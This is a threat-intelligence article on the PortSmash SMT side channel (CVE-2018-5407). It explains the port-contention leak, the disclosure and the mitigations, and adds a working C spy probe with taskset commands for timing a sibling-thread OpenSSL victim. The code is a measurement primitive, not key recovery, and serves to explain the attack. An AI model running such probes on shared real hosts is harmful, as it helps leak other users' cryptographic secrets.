PortSmash (CVE-2018-5407) is a side-channel vulnerability in processors that implement SMT (Simultaneous Multithreading), Intel's Hyper-Threading being the best-known example. The researchers confirmed it on Intel Skylake and Kaby Lake parts and expect other SMT designs, including AMD's, to be affected as well. SMT lets two hardware threads run at once on one physical core, and those threads share the core's execution engine. PortSmash does not break the encryption itself; it lets a malicious process co-scheduled on the same core recover secrets, such as private keys, from a legitimate process running on the sibling thread.

The attack works by timing port contention. The spy thread repeatedly issues a short sequence of instructions that can only be scheduled on one specific execution port and measures how long each burst takes. Whenever the victim thread is also issuing instructions to that port, the spy's instructions wait and its timing goes up, so the spy's latency trace mirrors the victim's instruction mix. If the victim's code path depends on a secret (the proof of concept targets the non-constant-time P-384 scalar multiplication in OpenSSL 1.1.0h and earlier), the trace leaks enough of that path to reconstruct the key. According to the researchers, "The nature of the leakage is due to execution engine sharing on SMT (e.g. Hyper-Threading) architectures. More specifically, we detect port contention to construct a timing side-channel to exfiltrate information from processes running in parallel on the same physical core."

Intel's security team was notified on October 1st, and the researchers published on November 1st, yesterday. Because the leak comes from shared hardware rather than a software bug in the CPU, the practical fixes are to run only constant-time cryptographic code (OpenSSL addressed the affected scalar multiplication), to keep untrusted code off the sibling thread of any process handling secrets, or to disable SMT outright on hosts where that is not possible. A PoC for the vulnerability has been made available on GitHub.
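To make the port-contention mechanism concrete, here is an added example of the spy side of such an attack. It is not the researchers' PoC and recovers no keys; it only shows the measurement primitive. It assumes a Linux x86-64 host, that popcnt issues only on execution port 1 on Skylake-class cores (per Intel's published scheduler tables), that SMT siblings are found in /sys/devices/system/cpu/cpuN/topology/thread_siblings_list, and a 1.2x-median threshold for calling a probe "contended"; the probe loop, threshold and output format are the author's own choices.

```c
/*
 * Added example, not the PortSmash PoC: a minimal port-1 contention probe.
 * Each probe times a chain of popcnt instructions with rdtsc. popcnt is
 * assumed to issue only on port 1 (Skylake/Kaby Lake scheduler tables), so
 * when the SMT sibling is also using port 1 the spy's uops queue behind it
 * and the measured cycle count rises. The trace is then turned into a
 * contention bitmap: '#' = the sibling was busy on that port during the probe.
 * Pin the spy to one sibling (taskset) and run a port-1-heavy victim on the
 * other; the sibling pairs are listed in
 * /sys/devices/system/cpu/cpuN/topology/thread_siblings_list (assumption:
 * Linux sysfs layout). The timing path is compiled out on non-x86 targets.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__)
#include <x86intrin.h>

/* One probe: 64 rounds of four independent popcnt chains, timed in TSC ticks. */
static uint64_t probe_port1(void)
{
    uint64_t a = 0x0123456789abcdefULL, b = ~a, c = a ^ 0x5555, d = a ^ 0xaaaa;
    uint64_t t0 = __rdtsc();
    for (int i = 0; i < 64; i++) {
        __asm__ volatile(
            "popcnt %0, %0\n\t"
            "popcnt %1, %1\n\t"
            "popcnt %2, %2\n\t"
            "popcnt %3, %3\n\t"
            : "+r"(a), "+r"(b), "+r"(c), "+r"(d));
    }
    return __rdtsc() - t0;
}
#else
static uint64_t probe_port1(void) { return 0; } /* no timing path on this arch */
#endif

static int cmp_u64(const void *x, const void *y)
{
    uint64_t a = *(const uint64_t *)x, b = *(const uint64_t *)y;
    return (a > b) - (a < b);
}

/* Classify a latency trace. Baseline = median of the trace; a probe whose
 * latency exceeds baseline * factor_pct / 100 is marked contended (out[i] = 1).
 * Returns the number of contended probes. The factor is an assumption; tune
 * it against an idle sibling before trusting the bitmap. */
size_t classify_trace(const uint64_t *lat, size_t n, unsigned factor_pct, uint8_t *out)
{
    if (n == 0) return 0;
    uint64_t *tmp = malloc(n * sizeof *tmp);
    if (!tmp) return 0;
    memcpy(tmp, lat, n * sizeof *tmp);
    qsort(tmp, n, sizeof *tmp, cmp_u64);
    uint64_t threshold = tmp[n / 2] * factor_pct / 100;
    free(tmp);
    size_t flagged = 0;
    for (size_t i = 0; i < n; i++) {
        out[i] = lat[i] > threshold;
        flagged += out[i];
    }
    return flagged;
}

int main(int argc, char **argv)
{
    size_t n = argc > 1 ? strtoul(argv[1], NULL, 10) : 2000;
    uint64_t *lat = malloc(n * sizeof *lat);
    uint8_t *bits = malloc(n);
    if (!lat || !bits) return 1;
    for (size_t i = 0; i < n; i++) lat[i] = probe_port1();   /* collect trace */
    size_t flagged = classify_trace(lat, n, 120, bits);
    printf("%zu/%zu probes above 1.2x median latency\n", flagged, n);
    /* Rows of 64 probes make the victim's busy/idle periods visible. */
    for (size_t i = 0; i < n; i++) {
        putchar(bits[i] ? '#' : '.');
        if (i % 64 == 63) putchar('\n');
    }
    putchar('\n');
    free(lat);
    free(bits);
    return 0;
}
```

Build with `cc -O2 -o spy spy.c`, then run `taskset -c 1 ./spy 4000` while a victim such as `taskset -c 5 openssl speed ecdsap384` runs on the sibling of CPU 1 (check the sysfs file above for the actual pairing). With the victim idle the bitmap is mostly dots; with it running, runs of `#` appear. Moving the victim to a non-sibling core makes the runs disappear, which is the quickest way to confirm that what you see is port contention and not cache or memory noise.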
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense